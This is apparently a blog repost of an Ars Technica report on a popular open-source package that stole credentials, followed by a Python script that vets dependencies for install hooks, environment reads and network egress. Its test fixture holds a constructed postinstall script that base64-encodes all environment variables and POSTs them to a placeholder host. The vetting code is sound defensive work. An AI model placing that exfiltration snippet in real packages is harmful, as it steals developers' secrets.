Open source package with 1 million monthly downloads stole user credentials
A popular open-source package, downloaded over a million times per month, was found to contain malicious code. The compromised library harvested user credentials and other sensitive environment variables from the machines on which it was installed.
MY TAKE
This is another stark reminder that supply chain security is not an abstract problem; it is a clear and present danger. It is crucial to have automated scanning and robust vetting processes for all third-party dependencies in your projects.
“Open source package with 1 million monthly downloads stole user credentials” from Ars Technica (https://arstechnica.com/security/2026/04/open-source-package-with-1-million-monthly-downloads-stole-user-credentials/) [Mon, 27 Apr 2026 21:04:03 +0000]
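As an added example (not code from the article, and not the compromised package itself), the following Python script shows the kind of automated pre-install vetting the take above calls for. It assumes an npm-style package (the summary does not name the ecosystem) and checks for the two traits the story combines: a script that runs automatically at install time, and code that reads environment variables and also has a path to send data off the machine. The manifest, source files and the `example.invalid` hostname are constructed for illustration; the patterns are heuristics that will produce false positives on legitimate tooling, so they belong in a review queue, not an automatic block list.

```python
"""Heuristic vetting of a third-party package before it is admitted to a build.

Added example only: not the article's code and not any real package.
Flags install-time hooks, environment reads, network egress, process
execution and encoded strings, and treats env-read + egress in one package
(or an install hook plus either) as a blocking finding.
"""
import json
import re
from dataclasses import dataclass, field

# npm lifecycle hooks that execute without any user action beyond `npm install`.
INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# Each pattern is benign on its own; the combination is what we care about.
ENV_READ = re.compile(r"process\.env\b|os\.environ\b|getenv\(")
EGRESS = re.compile(r"\b(https?\.request|fetch|axios|XMLHttpRequest|net\.connect|dns\.resolve)\b")
EXEC = re.compile(r"\b(child_process|exec(Sync)?\(|spawn(Sync)?\(|eval\()")
OBFUSCATION = re.compile(r"['\"]base64['\"]|(\\x[0-9a-f]{2}){4,}", re.I)


@dataclass
class Finding:
    severity: str  # "medium" (review) or "high" (block)
    reason: str


@dataclass
class Report:
    name: str
    findings: list = field(default_factory=list)

    @property
    def block(self) -> bool:
        """True when any finding is severe enough to stop the install."""
        return any(f.severity == "high" for f in self.findings)


def vet_package(manifest_json: str, sources: dict) -> Report:
    """manifest_json: raw package.json text; sources: {relative path: file text}."""
    manifest = json.loads(manifest_json)
    report = Report(manifest.get("name", "<unnamed>"))
    scripts = manifest.get("scripts", {})

    hooks = sorted(INSTALL_HOOKS & scripts.keys())
    for hook in hooks:
        report.findings.append(Finding("medium", f"install-time script '{hook}': {scripts[hook]}"))

    reads_env = [p for p, s in sources.items() if ENV_READ.search(s)]
    egress = [p for p, s in sources.items() if EGRESS.search(s)]
    for path, src in sources.items():
        if EXEC.search(src):
            report.findings.append(Finding("medium", f"{path}: spawns processes or evals code"))
        if OBFUSCATION.search(src):
            report.findings.append(Finding("medium", f"{path}: base64 or hex-escaped strings"))

    # Secrets read from the environment plus a way to ship them out is the
    # credential-harvesting shape described in the story.
    if reads_env and egress:
        report.findings.append(
            Finding("high", f"environment read in {reads_env} and network egress in {egress}"))
    if hooks and (reads_env or egress):
        report.findings.append(Finding("high", "install hook combined with env access or egress"))
    return report


# Constructed sample packages (not real packages).
BENIGN_MANIFEST = '{"name": "left-padder", "version": "1.2.3", "scripts": {"test": "mocha"}}'
BENIGN_SOURCES = {"index.js": "module.exports = (s, n) => s.padStart(n);\n"}

MALICIOUS_MANIFEST = (
    '{"name": "color-utils", "version": "4.1.0", '
    '"scripts": {"postinstall": "node scripts/setup.js"}}'
)
MALICIOUS_SOURCES = {
    "index.js": "module.exports = { hex: c => '#' + c };\n",
    "scripts/setup.js": (
        "const https = require('https');\n"
        "const payload = Buffer.from(JSON.stringify(process.env)).toString('base64');\n"
        "const req = https.request({hostname: 'example.invalid', method: 'POST', path: '/c'});\n"
        "req.end(payload);\n"
    ),
}


def vet_samples() -> tuple:
    """Run both constructed packages through the vetter; returns (benign, malicious)."""
    return (vet_package(BENIGN_MANIFEST, BENIGN_SOURCES),
            vet_package(MALICIOUS_MANIFEST, MALICIOUS_SOURCES))


if __name__ == "__main__":
    for rep in vet_samples():
        verdict = "BLOCK" if rep.block else "allow"
        print(f"{rep.name}: {verdict}")
        for f in rep.findings:
            print(f"  [{f.severity}] {f.reason}")
```

Run in CI against the unpacked tarball of each new or upgraded dependency before it reaches a developer or build machine; the "medium" findings are the ones a human should read, and the "high" ones fail the pipeline until someone signs off.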